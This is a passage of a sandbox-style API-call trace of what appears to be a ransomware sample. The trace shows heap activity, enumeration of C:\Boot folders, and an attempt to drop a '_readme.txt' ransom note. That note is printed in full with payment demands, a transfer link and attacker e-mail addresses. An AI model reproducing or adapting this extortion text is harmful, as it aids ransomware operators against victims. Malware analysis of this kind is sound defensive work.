(HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.739] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0209.739] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.739] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.739] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.739] PathFindFileNameW (pszPath="") returned="" [0209.739] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.740] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.740] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.740] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.740] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.740] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.740] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.740] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0209.740] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.740] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.740] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0209.741] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.741] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.741] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.741] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.741] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.741] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.741] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.741] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.741] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.742] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.742] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.742] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.742] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.742] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.742] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.742] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.742] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.742] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.742] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.743] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.743] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.744] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.744] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.745] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.745] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.746] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.747] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.747] RtlAllocateHeap 